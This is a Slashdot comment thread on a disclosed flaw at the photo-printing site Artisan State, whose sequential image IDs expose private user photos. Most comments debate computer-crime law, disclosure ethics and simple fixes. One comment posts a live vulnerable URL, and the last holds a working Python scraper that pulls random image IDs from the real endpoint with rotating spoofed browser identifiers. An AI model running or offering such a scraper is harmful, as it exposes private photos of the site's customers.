Photo Printing Website Artisan State Allows Access To All User-Uploaded Photos

fulldecent writes: Popular photo printing website Artisan State, which specializes in bound photo books mostly for weddings or other events, unintentionally makes all its uploaded user photos available publicly for download. This case study shows how their photos are able to be downloaded and discusses the things vendors should think about when considering security of seemingly private user content. The case study also discusses how this flaw was reported to the vendor, but unfortunately never fixed. This follows other articles on Slashdot discussing security disclosure. How do you report vulnerabilities to vendors? Do you support publishing them if they are not fixed in a reasonable time?

Careful

[phantomfive]

Be careful when using this vulnerability......depending on your purpose in using it, you could be literally committing a crime. If you download the images by modifying the URL.......people have gone to jail for that.

Re:Careful

[phantomfive]

I think you're trolling, but this guy went to jail for running almost the exact same script as is found in the article. This guy didn't even have malicious intent when he modified the URL, and he was still convicted.

Re:Careful

[phantomfive]

That's a really weird request, but the relevant law is the Computer Fraud and Abuse Act, 18 U.S.C. 1030

Re:Careful

The law being potentially broken: 18 U.S. Code 1030(a)(2)(c) - Whoever intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains information from any protected computer.

18 U.S. Code 1030(e) defines "protected computer" as "a computer which is used in or affecting interstate or foreign commerce or communication". This essentially means any computer connected to the Internet.

Changing the URL to access information the user was not intended to have access to can be considered "exceeding authorized access".

Re:Careful

[SeaFox]

Please cite the criminal code.

It would just be lumped in under that nebulous "unauthorized access to computer systems" of 18 USC 1030.

Re:Careful

[phantomfive]

That's cool. I'm not under the jurisdiction of USA.

That's cool. Maybe you also don't live in a country with an extradition treaty with the US. Maybe you also don't live in a country with a similar law against 'hacking.'

Re:Careful

[CaptainDork]

No.

The point of TFA is that a URL pointing to a photo ended with the number, "21470800," and the curious would naturally wonder, "Is there something before and after that number?"

There is, and a person doesn't even have to be logged in to view those photos.

There's nothing illegal about that. The photo at 21470800 has no accompanying narrative that even hints that a person should not be there.

Most people on /. are familiar with the Computer Fraud and Abuse Act, 18 U.S.C. 1030 and it does not apply here.

The author applied due diligence and more than enough fair warning. Customers have a right to know and the site consented by omission and failure to act.

Thanks for playing.

Re:Careful

[CaptainDork]

So, you're saying that law prohibits me from going to www.cnn.com/jdjdh##%^hndj, right?

Re:Careful

[phantomfive]

The point of TFA is that a URL pointing to a photo ended with the number, "21470800," and the curious would naturally wonder, "Is there something before and after that number?" There is, and a person doesn't even have to be logged in to view those photos. There's nothing illegal about that.

Well yes, it seems like a perfectly natural thing to do. And yet people have been arrested and gone to jail for it. Search the internet or read the other posts in this story if you want to free yourself from ignorance.

Also, nice sig.

Re:Careful

[Phil+Urich]

I surmise that, since the HTTP protocol contains provisions for a "Not Authorized" response, and barring any clearly and previously agreed-on terms, not receiving such response can be construed as implicit authorization.

Rationality and common sense agree with you. Unfortunately, US and UK case law (amongst others) does not . . .

Re:Careful

[gl4ss]

about 80% would extradite to the US though.
unfortunately.

or the company could pursue the local similar laws.

in this case though very unlikely, because there's too many people to prosecute it's likely that nobody will be prosecuted.

Re:Careful

[monkeyzoo]

Don't forget this nice Slashdot story:
http://yro.slashdot.org/story/...

An anonymous poster stated: "I recently discovered that a partner web site of a financial institution I do business with makes it trivially easy to view documents that do not belong to me. As in, change the document ID in a URL and view someone else's financial documents." He spoke customer service agents, escalated to a supervisor, and was told he would get a call back, but he never heard anything else. "I'm trying to be responsible and patient in my handling of this, but I am second guessing how to move forward if not quickly resolved. So, Slashdot, how would you handle this situation?"

Re:Careful

http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=21470776

Re:Careful

[dbIII]

If you piss someone off by doing it (eg. with the AT&T vunerability), sadly yes.
Doing the right thing and informing people of their security holes also counts as pissing them off and has landed people in jail.

If Kafka was writing today he's probably do a story on one of those insane trials.

Re:Careful

[fulldecent]

To add to the discussion regarding 18 U.S.C. 1030, I will note that this website does not affirmatively note anywhere that these photos are to be considered private.

Re:Careful

That's cool. I'm not under the jurisdiction of USA.

That's cool. Maybe you also don't live in a country with an extradition treaty with the US. Maybe you also don't live in a country with a similar law against 'hacking.'

To explain why the poster made those points, to be extradited requires not only that the country from which the person is being extradited has an extradition treaty, but also that the country has a similar law to the US law being broken, namely if the person had done the act against someone or something inside their own country it would also have been illegal there.

And for those who do not know, many countries, like Russia, will not allow their citizens to be extradited, so if someone in such a country hacks a US computer then there is nothing legally the US can do (other than wait for them to go to a country they can be extradited from, or lure them). The US will extradite a person to another country for hacking as long as that country is reciprocating. This means we won't send someone to Russia since they won't send anyone here.

Re:Careful

[twitnutttt]

It probably is all too common, but fixing it is completely easy:

1) get user id from logged in session, else return must login error
2) get photo id from URL and query db "exists where userid=X and photoid=Y", else return access denied error

It's trivially easy and f*ing negligent that anyone wouldn't do this.

Re: Careful

[davester666]

It's probably based off wordpress, so it literally will be impossible to fix.

Re:Careful

[Jane_Dozey]

That would fit, but only if it was normal to find cars parked in abundance that are unlocked and welcome people to open the door and get in. As it stands, the only reason to try a car door is if you are authorized to enter, or have malicious intent.

Re: Careful

[twitnutttt]

If they didn't design an app that has a concept of permissions even being *possible* then they have no business running a website like this.

Otherwise, yes, it is not hard to fix! And even granting that it were more difficult than one would ordinarily expect, the cost/benefit and risk/reward equations make it imperative to do so.

Re:Careful

[CaptainDork]

... free yourself from ignorance ...

I'm in the business, so I've already jumped that hurdle.

Re:Careful

[CaptainDork]

Incrementing a parameter in a URL by one has nothing to do with AT&T. I'm on TWC and it worked. I'm on Verizon and it worked.

The company hosting the photos can be pissed all they want. That doesn't matter. It's not illegal. The site is working inside the parameters and restrictions as applied by the company.

The valid concern regarding a pissing contest is between the company and its customers.

Re:Careful

[phantomfive]

Oh? Have you found any cases where people were jailed for similar things as in this article?

Re:Careful

[CaptainDork]

"Similarity" is not a legal concept. The Computer Fraud and Abuse Act, 18 U.S.C. 1030 does not have a provision for similarities.

Re:Careful

[phantomfive]

Please tell me oh great one, what is the source of your wisdom? Did you get a certification or something?

Re:Careful

[viperidaenz]

When was the last time USA extradited someone in China for hacking? They just blame it on the Chinese government, say boohoo, no sanctions for you, because we need you more than you need us.

Re:Careful

[CaptainDork]

I went the "or something" route and digested the law and attended a seminar regarding same, just like most IT professionals have.

We can't manage and comply with what we don't understand, as obviated by your example.

Re:Careful

[phantomfive]

Oh, a seminar. What a credential!

Re:Careful

[dbIII]

Incrementing a parameter in a URL by one has nothing to do with AT&T

One of the examples given by another poster was some poor bastard that went to jail for "hacking" AT&T by changing a URL and then contacting AT&T to tell them they had a problem.

Re:Careful

[CaptainDork]

I did not get a PHD in the subject.

I apologize for my shortcomings.

Re:Careful

[phantomfive]

So anyway, if you do try to modify the URL to access unauthorized areas of the website, you are not only breaking the law, you are literally hacking. The security they use is lousy, but the fact that someone leaves their door open does not allow you to trespass.

Re:Careful

[CaptainDork]

So anyway, they fixed it and anyway, here's your fail:

... to access unauthorized areas ...

The link (before they fixed it) displayed only one thing: A photo.

There was no narrative either above, or below, and no narrative on either side of the photo.

Incrementing that number by one or decrementing by one (or multiples thereof) produced more photos but no narratives.

You're telling me I'm driving in a school zone but it's a secret.

Here's a truncation of the link above that DOES provide narrative:

http://upload.artisanstate.com/upload/

I modified a URL by backing over some of it.

Show me where that's illegal.

Re:Careful

[phantomfive]

What's your point, that the law is irrational?

Re:Careful

[CaptainDork]

No, it's not the law that's irrational here.

That's why you failed to answer the question.

Re:Careful

[phantomfive]

That's why you failed to answer the question.

Hey genius, you forgot to ask a question.

Also, you really entertain me. You say people can't go to jail for this kind of thing, whereas people already have.

Re:Careful

[CaptainDork]

I'm not going to jail and here's on you:

Show me where that's illegal.

Don't trust any website

[phantomfive]

The article asks:

I was preparing a book for one of my clients and as I am uploading the photos, which are personal, the first thought was... should I really be uploading these photos to this website, we just met?

The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.

Re:Don't trust any website

[Meshach]

The article asks:

I was preparing a book for one of my clients and as I am uploading the photos, which are personal, the first thought was... should I really be uploading these photos to this website, we just met?

The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.

I assume that whoever is speaking in the article has a job / contract to prepare these photos for clients who have requested that they upload the photos to the service. In that case leaving them off the Internet is not an option.

Re:Don't trust any website

[fulldecent]

Obviously the photos aren't that private (the Asian girl), since I put them on Slashdot's front page. But the others ones (now seeing the lax security) it will be worth for me to invest in a good printer and print on my own.

Full Disclosure is the only way...

[Midnight_Falcon]

I've reported serious vulnerabilities to a number of companies in the past. Generally, they acknowledge receipt of the information but do nothing to fix the problem -- e.g. a race condition, a SQL injection vulnerability, etc etc. However, when I've posted information on reddit or other internet forums, the bugs tend to get fixed rather quickly.

Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.

Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.

Re:Full Disclosure is the only way...

[phantomfive]

There is only one reason to not do full disclosure......and that is if users are unable to defend themselves.

For example, if you find a vulnerability in Squid, and an admin can defend against the vulnerability by disabling a particular extension, then you are leaving users defenseless by not disclosing it. It's irresponsible to keep it secret, because black-hats out there may already be exploiting it.

Re:Full Disclosure is the only way...

[godel_56]

I've reported serious vulnerabilities to a number of companies in the past. Generally, they acknowledge receipt of the information but do nothing to fix the problem -- e.g. a race condition, a SQL injection vulnerability, etc etc. However, when I've posted information on reddit or other internet forums, the bugs tend to get fixed rather quickly.

Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.

Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.

I hope you make the contacts anonymously, because bad things tend to happen to whistle blowers. The "shoot the messenger" philosophy is alive and well in many companies and governments.

Re:Full Disclosure is the only way...

[fulldecent]

Thank you, this is the discussion I hoped would come out of this article. Fact is, people on Slashdot are definitely going to stumble onto this type of stuff over and over. I'm glad to run into other people to compare scruples with.

Hackers (good word) have an instinct. If they run into an awesome API, the first thought is: how do I maximize this across all the limits and make something amazing? But with vulnerabilities, and unintended code paths, you need to step back and understand the consequences of what you are doing as well as the appearance of what you are doing. A comment from Greyfox below illustrates perfectly, "so why don't we take the dick-detection algorithm from Chat Roulette and then plug that into a batch Curl against this Artisan State, and then...". Obviously that was facetious, but you need to avoid certain lines of thinking... "well I know this thing, and I could tell everyone, but they wouldn't want that, and then they have lots of money...".

At the end of the day, you need to have clear intentions and don't inflate your ego by thinking they are more interested in fixing the problem than you are.

Re:Full Disclosure is the only way...

[twitnutttt]

5 days seems crazy quick.

Agreed. 30 days notice seems to be sort of the minimum norm for advance notice before disclosure.

Handled very well ...

[CaptainDork]

... plenty of lead time and followup.

These issues need to be publicized when the hosting site doesn't give a fuck. Customers have a right to know.

John Oliver Already Covered This

[Greyfox]

You know there's pictures of penises in there, anyone can get to them. 'Nuff said, right? Wasn't chat roulette working on some penis detection code? Perhaps someone could hook that code up to an automated web robot to automatically ferret the dick pics out of this site.

Re:John Oliver Already Covered This

[Lehk228]

yes write me a program that finds and lists dick pics.

so that... i can..... remove them ... of course...

Car Analogy

If you see a car unlocked you tell the owner, but you don't tell everyone. If you see a flaw in the design of the door which means all of the cars will be unlocked you don't have any way to tell the owners without telling everyone.

publish

[frovingslosh]

After being arrested, tortured and killed for trying to alert an on-line service to their vulnerability due to poor design, I no long try to contact vendors directly. I now publish the information in great detail to pirate sites, and I have found that this will get the attention of the company much better than trying to alert them quietly.

Re:publish

[beerdragoon]

He got better.

Re:"Artisanal"? What the fuck does that even mean?

[tompaulco]

Your hipster district is obviously different than mine. I have literally never seen the word artisanal other than in your post. I see the word artisan all the time, but I believe in 100% of cases, it is used incorrectly. According to the dictionary it means "using a trained artistic skill". I have seen minimum wage workers slapping sandwiches together called "sandwich artisans". Nope. Slapping sandwiches together in a poor fashion and forgetting half the ingredients is not artisanship.

I have to support disclosure

[Todd+Knarr]

In an ideal world you'd notify the vendor, the problem would get fixed and the world would move on. Alas, we don't live in ideal world. Vendors fail to fix problems. Users don't upgrade software, or can't upgrade it or are unaware they're even using it, and the vendor doesn't publicly announce the fix and the need to apply it. The threat of disclosure, and the eventual disclosure even if the vendor doesn't say anything, is the only leverage we have to make sure vendors really do fix problems and users know what they need to know to assess the risks and mitigate the problem if they can't apply the fix. I'd love not to need to use that leverage, but we've seen how well that works already and we see repeated examples showing that vendors haven't changed their ways. Realistically the best we can manage is to notify the vendor (with full details, so they can verify the flaw is real and can't believably claim they couldn't replicate it) and give a deadline for either fixing the problem or providing mitigation measures, and then follow through with complete disclosure (so others can verify the problem's real without having to take our word for it) if the deadline passes without the vendor having disclosed the details themselves.

Unfortunately too many vendors have made it unsafe to do even that much. They don't just ignore problem reports and deny the problem exists, they actively try to silence the person reporting it through lawsuits and criminal prosecution and smear campaigns. When dealing with vendors like that you can't safely notify the vendor of a problem. I don't like it, but when dealing with a vendor like that all you can do is dump all the details into one or more suitable disclosure forums and make sure you've covered your tracks thoroughly so the vendor can't trace the disclosure back to you. Then clam up on the subject and don't say a single word anywhere to give anyone the idea that you were at all involved, lest you give the vendor a reason to suspect you. It's not a polite, civilized way of dealing with the matter, but I figure if the vendor's made it's bed it's just going to have to lay in it.

Re:"Artisanal"? What the fuck does that even mean?

[friedmud]

My favorite is when people mispronounce / misspell artisan as artesian.

I always ask them what those pastries/bread/haircuts/etc. have to do with natural water wells :-)

Oblig. Schneier essay on Full Disclosure

[Phil+Urich]

https://www.schneier.com/essay... Well worth the read if you haven't before.

Re:"Artisanal"? What the fuck does that even mean?

[dbIII]

Well, that's giving it the level of respect it normally deserves. One word that doesn't fit is as good as another.

I always ask them what those pastries/bread/haircuts/etc. have to do with ... water wells

It's the pressure man!

My pet hate now is I live in a suburb on a bend on a river and a pile of trendy people are calling it a "village" on a "peninsula".

First vulnerability release on /.?

[monkeyzoo]

First time a vulnerability was disclosed on Slashdot?

Re:fixed?

[Hognoxious]

Yup. See those gold highlights in the background in the one where they're dancing? Distinctly oval.

Artisan pizza? No thanks, carpenters are chewy.

[Hognoxious]

I have literally never seen the word artisanal other than in your post.

So you have a poor vocabulary. Try watching something other than Fox news.

Of course it's possible you live in a place full of fuckwits and they just use the noun as an adjective. Artisan sandwich? Are they cannibals round here?

Like this?

import requests
import random
import os
import sys
import time

sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
tmp_pth = 'C:\\temp'
os.chdir(tmp_pth)
headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "User-Agent": "Mozilla/"+str(round(random.random() * 5, 1))+" (Windows NT 6; WOW32; rv:38.0) Gecko/20100101 Firefox/"+str(round(random.random() * 37, 1)),
        "DNT": "1"
        }

agents = [
        "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
        "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
        "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
        "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
        ]
for i in range(200):
        ID = str(int(random.random() * 8000000))
        headers["User-Agent"] = agents[int(random.random() * 10)]
        r = requests.get(
                        'http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=' + ID,
                        headers=headers)
        fh = open(ID+'.jpg', 'wb')
        fh.write(r.content)
        fh.close()
        print 'wrote', i, tmp_pth+'\\'+ID+'.jpg'
        time.sleep(random.random()/10.)